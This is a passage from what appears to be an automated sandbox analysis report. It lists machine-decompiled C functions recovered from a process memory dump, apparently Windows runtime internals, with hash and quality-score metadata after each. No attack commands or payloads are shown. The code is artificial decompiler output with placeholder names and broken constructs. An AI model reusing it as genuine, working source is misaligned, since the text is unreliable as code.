            					 *0x45160fc =  *0x45160fc + 0xffff;
            				}
            				E0443FFB0(_t41, 0x800, 0x1596f1a0);
            				if(_t41 != 0) {
            					L6:
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
            					do {
            						asm("lock xadd [0x45160f0], ax");
            						 *((short*)(_t41 + 0x34)) = 1;
            					} while (1 == 0);
            					goto L8;
            				} else {
            					_t41 = L04444620(0x4516100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
            					if(_t41 == 0) {
            						L11:
            						asm("lock dec dword [0x4516100]");
            						L8:
            						return _t41;
            					}
            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
            					if(_t41 == 0) {
            						goto L11;
            					}
            					goto L6;
            				}
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5ce4a34cd5d388a8c6617f8e7d8d65dc7115bd4c42489f57cdea7b225de2794a
            • Instruction ID: 2fd11822969bc826d2aea6dce81a1e3627066bc8a2aa3de69ca6552f94a4fc4b
            • Opcode Fuzzy Hash: 5ce4a34cd5d388a8c6617f8e7d8d65dc7115bd4c42489f57cdea7b225de2794a
            • Instruction Fuzzy Hash: 1B31DF32A006969BEF11DF58D4807A673B4FB18315F0544BAED44DB322E678FE09DB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E04429100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
            				signed int _t53;
            				signed int _t56;
            				signed int* _t60;
            				signed int _t63;
            				signed int _t66;
            				signed int _t69;
            				void* _t70;
            				intOrPtr* _t72;
            				void* _t78;
            				void* _t79;
            				signed int _t80;
            				intOrPtr _t82;
            				void* _t85;
            				void* _t88;
            				void* _t89;
            
            				_t84 = __esi;
            				_t70 = __ecx;
            				_t68 = __ebx;
            				_push(0x2c);
            				_push(0x44ff6e8);
            				E0447D0E8(__ebx, __edi, __esi);
            				 *((char*)(_t85 - 0x1d)) = 0;
            				_t82 =  *((intOrPtr*)(_t85 + 8));
            				if(_t82 == 0) {
            					L4:
            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
            						E044F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
            					}
            					L5:
            					return E0447D130(_t68, _t82, _t84);
            				}
            				_t88 = _t82 -  *0x45186c0; // 0x1707b0
            				if(_t88 == 0) {
            					goto L4;
            				}
            				_t89 = _t82 -  *0x45186b8; // 0x0
            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
            					goto L4;
            				} else {
            					E04442280(_t82 + 0xe0, _t82 + 0xe0);
            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
            					__eflags =  *((char*)(_t82 + 0xe5));
            					if(__eflags != 0) {
            						E044F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
            						goto L12;
            					} else {
            						__eflags =  *((char*)(_t82 + 0xe4));
            						if( *((char*)(_t82 + 0xe4)) == 0) {
            							 *((char*)(_t82 + 0xe4)) = 1;
            							_push(_t82);
            							_push( *((intOrPtr*)(_t82 + 0x24)));
            							E0446AFD0();
            						}
            						while(1) {
            							_t60 = _t82 + 8;
            							 *(_t85 - 0x2c) = _t60;
            							_t68 =  *_t60;
            							_t80 = _t60[1];
            							 *(_t85 - 0x28) = _t68;
            							 *(_t85 - 0x24) = _t80;
            							while(1) {
            								L10:
            								__eflags = _t80;
            								if(_t80 == 0) {
            									break;
            								}
            								_t84 = _t68;
            								 *(_t85 - 0x30) = _t80;
            								 *(_t85 - 0x24) = _t80 - 1;
            								asm("lock cmpxchg8b [edi]");
            								_t68 = _t84;
            								 *(_t85 - 0x28) = _t68;
            								 *(_t85 - 0x24) = _t80;
            								__eflags = _t68 - _t84;
            								_t82 =  *((intOrPtr*)(_t85 + 8));
            								if(_t68 != _t84) {
            									continue;
            								}
            								__eflags = _t80 -  *(_t85 - 0x30);
            								if(_t80 !=  *(_t85 - 0x30)) {
            									continue;
            								}
            								__eflags = _t80;
            								if(_t80 == 0) {
            									break;
            								}
            								_t63 = 0;
            								 *(_t85 - 0x34) = 0;
            								_t84 = 0;
            								__eflags = 0;
            								while(1) {
            									 *(_t85 - 0x3c) = _t84;
            									__eflags = _t84 - 3;
            									if(_t84 >= 3) {
            										break;
            									}
            									__eflags = _t63;
            									if(_t63 != 0) {
            										L40:
            										_t84 =  *_t63;
            										__eflags = _t84;
            										if(_t84 != 0) {
            											_t84 =  *(_t84 + 4);
            											__eflags = _t84;
            											if(_t84 != 0) {
            												 *0x451b1e0(_t63, _t82);
            												 *_t84();
            											}
            										}
            										do {
            											_t60 = _t82 + 8;
            											 *(_t85 - 0x2c) = _t60;
            											_t68 =  *_t60;
            											_t80 = _t60[1];
            											 *(_t85 - 0x28) = _t68;
            											 *(_t85 - 0x24) = _t80;
            											goto L10;
            										} while (_t63 == 0);
            										goto L40;
            									}
            									_t69 = 0;
            									__eflags = 0;
            									while(1) {
            										 *(_t85 - 0x38) = _t69;
            										__eflags = _t69 -  *0x45184c0;
            										if(_t69 >=  *0x45184c0) {
            											break;
            										}
            										__eflags = _t63;
            										if(_t63 != 0) {
            											break;
            										}
            										_t66 = E044F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
            										__eflags = _t66;
            										if(_t66 == 0) {
            											_t63 = 0;
            											__eflags = 0;
            										} else {
            											_t63 = _t66 + 0xfffffff4;
            										}
            										 *(_t85 - 0x34) = _t63;
            										_t69 = _t69 + 1;
            									}
            									_t84 = _t84 + 1;
            								}
            								__eflags = _t63;
            							}
            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
            							 *((char*)(_t82 + 0xe5)) = 1;
            							 *((char*)(_t85 - 0x1d)) = 1;
            							L12:
            							 *(_t85 - 4) = 0xfffffffe;
            							E0442922A(_t82);
            							_t53 = E04447D50();
            							__eflags = _t53;
            							if(_t53 != 0) {
            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            							} else {
            								_t56 = 0x7ffe0386;
            							}
            							__eflags =  *_t56;
            							if( *_t56 != 0) {
            								_t56 = E044F8B58(_t82);
            							}
            							__eflags =  *((char*)(_t85 - 0x1d));
            							if( *((char*)(_t85 - 0x1d)) != 0) {
            								__eflags = _t82 -  *0x45186c0; // 0x1707b0
            								if(__eflags != 0) {
            									__eflags = _t82 -  *0x45186b8; // 0x0
            									if(__eflags == 0) {
            										_t79 = 0x45186bc;
            										_t72 = 0x45186b8;
            										goto L18;
            									}
            									__eflags = _t56 | 0xffffffff;
            									asm("lock xadd [edi], eax");
            									if(__eflags == 0) {
            										E04429240(_t68, _t82, _t82, _t84, __eflags);
            									}
            								} else {
            									_t79 = 0x45186c4;
            									_t72 = 0x45186c0;
            									L18:
            									E04459B82(_t68, _t72, _t79, _t82, _t84, __eflags);
            								}
            							}
            							goto L5;
            						}
            					}
            				}
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eb85aba47f4fbbf0eca94ff18bcb6e0162f4ccf3f1b0fb032e50e8ecc805565a
            • Instruction ID: d6b3eca70b796e8ee3aba9cc34af7f354baab9581c230f4fcc1a0e2df17c4730
            • Opcode Fuzzy Hash: eb85aba47f4fbbf0eca94ff18bcb6e0162f4ccf3f1b0fb032e50e8ecc805565a
            • Instruction Fuzzy Hash: 3A317CB1B002949FFF25EF6AC6887AEB7B1BB48354F58854BC40467351C375B980CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 53%
            			E04440050(void* __ecx) {
            				signed int _v8;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr* _t30;
            				intOrPtr* _t31;
            				signed int _t34;
            				void* _t40;
            				void* _t41;
            				signed int _t44;
            				intOrPtr _t47;
            				signed int _t58;
            				void* _t59;
            				void* _t61;
            				void* _t62;
            				signed int _t64;
            
            				_push(__ecx);
            				_v8 =  *0x451d360 ^ _t64;
            				_t61 = __ecx;
            				_t2 = _t61 + 0x20; // 0x20
            				E04459ED0(_t2, 1, 0);
            				_t52 =  *(_t61 + 0x8c);
            				_t4 = _t61 + 0x8c; // 0x8c
            				_t40 = _t4;
            				do {
            					_t44 = _t52;
            					_t58 = _t52 & 0x00000001;
            					_t24 = _t44;
            					asm("lock cmpxchg [ebx], edx");
            					_t52 = _t44;
            				} while (_t52 != _t44);
            				if(_t58 == 0) {
            					L7:
            					_pop(_t59);
            					_pop(_t62);
            					_pop(_t41);
            					return E0446B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
            				}
            				asm("lock xadd [esi], eax");
            				_t47 =  *[fs:0x18];
            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
            				if(_t30 != 0) {
            					if( *_t30 == 0) {
            						goto L4;
            					}
            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            					L5:
            					if( *_t31 != 0) {
            						_t18 = _t61 + 0x78; // 0x78
            						E044F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
            					}
            					_t52 =  *(_t61 + 0x5c);
            					_t11 = _t61 + 0x78; // 0x78
            					_t34 = E04459702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
            					_t24 = _t34 | 0xffffffff;
            					asm("lock xadd [esi], eax");
            					if((_t34 | 0xffffffff) == 0) {
            						 *0x451b1e0(_t61);
            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
            					}
            					goto L7;
            				}
            				L4:
            				_t31 = 0x7ffe0386;
            				goto L5;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c094c7cd9c1c0f6b3ddc2d75c1c0a769306d5ef4ac5685d35f02e244bc173e66
            • Instruction ID: 70c0ab6ea56e65977e89d6d5538ef82c7c9bcd87bdee69eb59c91d45caa5e260
            • Opcode Fuzzy Hash: c094c7cd9c1c0f6b3ddc2d75c1c0a769306d5ef4ac5685d35f02e244bc173e66
            • Instruction Fuzzy Hash: 65316B31601B04DFEB21CF28D840B5AB3E5FF89718F14856EE59687BA0EB75B801DB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E044A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
            				signed short* _v8;
            				signed char _v12;
            				void* _t22;
            				signed char* _t23;
            				intOrPtr _t24;
            				signed short* _t44;
            				void* _t47;
            				signed char* _t56;
            				signed char* _t58;
            
            				_t48 = __ecx;
            				_push(__ecx);
            				_push(__ecx);
            				_t44 = __ecx;
            				_v12 = __edx;
            				_v8 = __ecx;
            				_t22 = E04447D50();
            				_t58 = 0x7ffe0384;
            				if(_t22 == 0) {
            					_t23 = 0x7ffe0384;
            				} else {
            					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            				}
            				if( *_t23 != 0) {
            					_t24 =  *0x4517b9c; // 0x0
            					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
            					_t23 = L04444620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
            					_t56 = _t23;
            					if(_t56 != 0) {
            						_t56[0x24] = _a4;
            						_t56[0x28] = _a8;
            						_t56[6] = 0x1420;
            						_t56[0x20] = _v12;
            						_t14 =  &(_t56[0x2c]); // 0x2c
            						E0446F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
            						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
            						if(E04447D50() != 0) {
            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            						}
            						_push(_t56);
            						_push(_t47 - 0x20);
            						_push(0x402);
            						_push( *_t58 & 0x000000ff);
            						E04469AE0();
            						_t23 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
            					}
            				}
            				return _t23;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9681cff171fabfe7266c056402f8e7a6b7d0e76c7cdbffc7e9222b0940b10f85
            • Instruction ID: 46ad2dc8e0154ad2909151154f40a61235f05ef633d7f44a033978ff84a81874
            • Opcode Fuzzy Hash: 9681cff171fabfe7266c056402f8e7a6b7d0e76c7cdbffc7e9222b0940b10f85
            • Instruction Fuzzy Hash: 11219AB1A00644ABEB11DF69D880E6AB7A8FF48704F08006AF945C7791EB34ED11CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E044690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
            				intOrPtr* _v0;
            				void* _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				char _v36;
            				void* _t38;
            				intOrPtr _t41;
            				void* _t44;
            				signed int _t45;
            				intOrPtr* _t49;
            				signed int _t57;
            				signed int _t58;
            				intOrPtr* _t59;
            				void* _t62;
            				void* _t63;
            				void* _t65;
            				void* _t66;
            				signed int _t69;
            				intOrPtr* _t70;
            				void* _t71;
            				intOrPtr* _t72;
            				intOrPtr* _t73;
            				char _t74;
            
            				_t65 = __edx;
            				_t57 = _a4;
            				_t32 = __ecx;
            				_v8 = __edx;
            				_t3 = _t32 + 0x14c; // 0x14c
            				_t70 = _t3;
            				_v16 = __ecx;
            				_t72 =  *_t70;
            				while(_t72 != _t70) {
            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
            						L24:
            						_t72 =  *_t72;
            						continue;
            					}
            					_t30 = _t72 + 0x10; // 0x10
            					if(E0447D4F0(_t30, _t65, _t57) == _t57) {
            						return 0xb7;
            					}
            					_t65 = _v8;
            					goto L24;
            				}
            				_t61 = _t57;
            				_push( &_v12);
            				_t66 = 0x10;
            				if(E0445E5E0(_t57, _t66) < 0) {
            					return 0x216;
            				}
            				_t73 = L04444620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
            				if(_t73 == 0) {
            					_t38 = 0xe;
            					return _t38;
            				}
            				_t9 = _t73 + 0x10; // 0x10
            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
            				E0446F3E0(_t9, _v8, _t57);
            				_t41 =  *_t70;
            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
            					_t62 = 3;
            					asm("int 0x29");
            					_push(_t62);
            					_push(_t57);
            					_push(_t73);
            					_push(_t70);
            					_t71 = _t62;
            					_t74 = 0;
            					_v36 = 0;
            					_t63 = E0445A2F0(_t62, _t71, 1, 6,  &_v36);
            					if(_t63 == 0) {
            						L20:
            						_t44 = 0x57;
            						return _t44;
            					}
            					_t45 = _v12;
            					_t58 = 0x1c;
            					if(_t45 < _t58) {
            						goto L20;
            					}
            					_t69 = _t45 / _t58;
            					if(_t69 == 0) {
            						L19:
            						return 0xe8;
            					}
            					_t59 = _v0;
            					do {
            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
            							goto L18;
            						}
            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
            						 *_t59 = _t49;
            						if( *_t49 != 0x53445352) {
            							goto L18;
            						}
            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
            						return 0;
            						L18:
            						_t63 = _t63 + 0x1c;
            						_t74 = _t74 + 1;
            					} while (_t74 < _t69);
            					goto L19;
            				}
            				 *_t73 = _t41;
            				 *((intOrPtr*)(_t73 + 4)) = _t70;
            				 *((intOrPtr*)(_t41 + 4)) = _t73;
            				 *_t70 = _t73;
            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
            				return 0;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
            • Instruction ID: c0a28da9cd9da6d65b9d2af252eb825362cd89b69413c0b3d0c2aac51fb20887
            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
            • Instruction Fuzzy Hash: A721AFB1A00204EFEF20DF59C844AAAF7F8EB54710F14886BE986A7200D270B9008F91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E04453B7A(void* __ecx) {
            				signed int _v8;
            				char _v12;
            				intOrPtr _v20;
            				intOrPtr _t17;
            				intOrPtr _t26;
            				void* _t35;
            				void* _t38;
            				void* _t41;
            				intOrPtr _t44;
            
            				_t17 =  *0x45184c4; // 0x0
            				_v12 = 1;
            				_v8 =  *0x45184c0 * 0x4c;
            				_t41 = __ecx;
            				_t35 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x45184c0 * 0x4c);
            				if(_t35 == 0) {
            					_t44 = 0xc0000017;
            				} else {
            					_push( &_v8);
            					_push(_v8);
            					_push(_t35);
            					_push(4);
            					_push( &_v12);
            					_push(0x6b);
            					_t44 = E0446AA90();
            					_v20 = _t44;
            					if(_t44 >= 0) {
            						E0446FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x45184c0 * 0xc);
            						_t38 = _t35;
            						if(_t35 < _v8 + _t35) {
            							do {
            								asm("movsd");
            								asm("movsd");
            								asm("movsd");
            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
            							} while (_t38 < _v8 + _t35);
            							_t44 = _v20;
            						}
            					}
            					_t26 =  *0x45184c4; // 0x0
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
            				}
            				return _t44;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c5f3e65ff30ad0e86a28b4c4cd7caae7e6843cdb70a23892d4edd47d8bdda0a9
            • Instruction ID: 8c0b9856f72da4edf2b7582551865c623eb991b030032398ac17b085bb755203
            • Opcode Fuzzy Hash: c5f3e65ff30ad0e86a28b4c4cd7caae7e6843cdb70a23892d4edd47d8bdda0a9
            • Instruction Fuzzy Hash: CC21C272600104AFDB11DF58CD81B5AB7BDFB40348F150469E905AB262D775FD15DB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E044A6CF0(void* __edx, intOrPtr _a4, short _a8) {
            				char _v8;
            				char _v12;
            				char _v16;
            				char _v20;
            				char _v28;
            				char _v36;
            				char _v52;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				signed char* _t21;
            				void* _t24;
            				void* _t36;
            				void* _t38;
            				void* _t46;
            
            				_push(_t36);
            				_t46 = __edx;
            				_v12 = 0;
            				_v8 = 0;
            				_v20 = 0;
            				_v16 = 0;
            				if(E04447D50() == 0) {
            					_t21 = 0x7ffe0384;
            				} else {
            					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
            				}
            				if( *_t21 != 0) {
            					_t21 =  *[fs:0x30];
            					if((_t21[0x240] & 0x00000004) != 0) {
            						if(E04447D50() == 0) {
            							_t21 = 0x7ffe0385;
            						} else {
            							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
            						}
            						if(( *_t21 & 0x00000020) != 0) {
            							_t56 = _t46;
            							if(_t46 == 0) {
            								_t46 = 0x4405c80;
            							}
            							_push(_t46);
            							_push( &_v12);
            							_t24 = E0445F6E0(_t36, 0, _t46, _t56);
            							_push(_a4);
            							_t38 = _t24;
            							_push( &_v28);
            							_t21 = E0445F6E0(_t38, 0, _t46, _t56);
            							if(_t38 != 0) {
            								if(_t21 != 0) {
            									E044A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
            									L04442400( &_v52);
            								}
            								_t21 = L04442400( &_v28);
            							}
            						}
            					}
            				}
            				return _t21;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e748268cff9570ccbb9eb552a54e6b00c5c102473ef69f47471459b36ae6412d
            • Instruction ID: f44f938a3e55baef2cc0dbd10165d2468b222de6e763b96272d4954eb0f3a66d
            • Opcode Fuzzy Hash: e748268cff9570ccbb9eb552a54e6b00c5c102473ef69f47471459b36ae6412d
            • Instruction Fuzzy Hash: EF21F5725042449BEF21DF29C944B6BB7ECEF91784F09045BFD90C7262E734E519C6A2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E044F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
            				char _v8;
            				intOrPtr _v11;
            				signed int _v12;
            				intOrPtr _v15;
            				signed int _v16;
            				intOrPtr _v28;
            				void* __ebx;
            				char* _t32;
            				signed int* _t38;
            				signed int _t60;
            
            				_t38 = __ecx;
            				_v16 = __edx;
            				_t60 = E044F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
            				if(_t60 != 0) {
            					_t7 = _t38 + 0x38; // 0x29cd5903
            					_push( *_t7);
            					_t9 = _t38 + 0x34; // 0x6adeeb00
            					_push( *_t9);
            					_v12 = _a8 << 0xc;
            					_t11 = _t38 + 4; // 0x5de58b5b
            					_push(0x4000);
            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
            					E044EAFDE( &_v8,  &_v12);
            					E044F1293(_t38, _v28, _t60);
            					if(E04447D50() == 0) {
            						_t32 = 0x7ffe0380;
            					} else {
            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
            					}
            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
            						_t21 = _t38 + 0x3c; // 0xc3595e5f
            						E044E14FB(_t38,  *_t21, _v11, _v15, 0xd);
            					}
            				}
            				return  ~_t60;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
            • Instruction ID: 0a7619225c0bd0dce2fae2a71eccc0eea5653489305471cfa2b3a8357e0ae281
            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
            • Instruction Fuzzy Hash: 0B21F2362046009FDB15DF59CC80B6ABBE5EBC4350F04856EFA959B392D730E909CB92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E0444AE73(intOrPtr __ecx, void* __edx) {
            				intOrPtr _v8;
            				void* _t19;
            				char* _t22;
            				signed char* _t24;
            				intOrPtr _t25;
            				intOrPtr _t27;
            				void* _t31;
            				intOrPtr _t36;
            				char* _t38;
            				signed char* _t42;
            
            				_push(__ecx);
            				_t31 = __edx;
            				_v8 = __ecx;
            				_t19 = E04447D50();
            				_t38 = 0x7ffe0384;
            				if(_t19 != 0) {
            					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            				} else {
            					_t22 = 0x7ffe0384;
            				}
            				_t42 = 0x7ffe0385;
            				if( *_t22 != 0) {
            					if(E04447D50() == 0) {
            						_t24 = 0x7ffe0385;
            					} else {
            						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
            					}
            					if(( *_t24 & 0x00000010) != 0) {
            						goto L17;
            					} else {
            						goto L3;
            					}
            				} else {
            					L3:
            					_t27 = E04447D50();
            					if(_t27 != 0) {
            						_t27 =  *[fs:0x30];
            						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
            					}
            					if( *_t38 != 0) {
            						_t27 =  *[fs:0x30];
            						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
            							goto L5;
            						}
            						_t27 = E04447D50();
            						if(_t27 != 0) {
            							_t27 =  *[fs:0x30];
            							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
            						}
            						if(( *_t42 & 0x00000020) != 0) {
            							L17:
            							_t25 = _v8;
            							_t36 = 0;
            							if(_t25 != 0) {
            								_t36 =  *((intOrPtr*)(_t25 + 0x18));
            							}
            							_t27 = E044A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
            						}
            						goto L5;
            					} else {
            						L5:
            						return _t27;
            					}
            				}
            			}














            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
            • Instruction ID: 13c313136dd79b54d1585b4a70b067197d943277a2b136d5a3dddc6c53850f4c
            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
            • Instruction Fuzzy Hash: 7D21CF71641680AFFF21DB29C944B263BE8BB84340F1904E2DD049B792E774FC41D690
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E044A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _t21;
            				void* _t24;
            				intOrPtr _t25;
            				void* _t36;
            				short _t39;
            				signed char* _t42;
            				unsigned int _t46;
            				void* _t50;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t21 =  *0x4517b9c; // 0x0
            				_t46 = _a8;
            				_v12 = __edx;
            				_v8 = __ecx;
            				_t4 = _t46 + 0x2e; // 0x2e
            				_t36 = _t4;
            				_t24 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
            				_t50 = _t24;
            				if(_t50 != 0) {
            					_t25 = _a4;
            					if(_t25 == 5) {
            						L3:
            						_t39 = 0x14b1;
            					} else {
            						_t39 = 0x14b0;
            						if(_t25 == 6) {
            							goto L3;
            						}
            					}
            					 *((short*)(_t50 + 6)) = _t39;
            					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
            					_t11 = _t50 + 0x2c; // 0x2c
            					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
            					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
            					E0446F3E0(_t11, _a12, _t46);
            					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
            					if(E04447D50() == 0) {
            						_t42 = 0x7ffe0384;
            					} else {
            						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            					}
            					_push(_t50);
            					_t19 = _t36 - 0x20; // 0xe
            					_push(0x403);
            					_push( *_t42 & 0x000000ff);
            					E04469AE0();
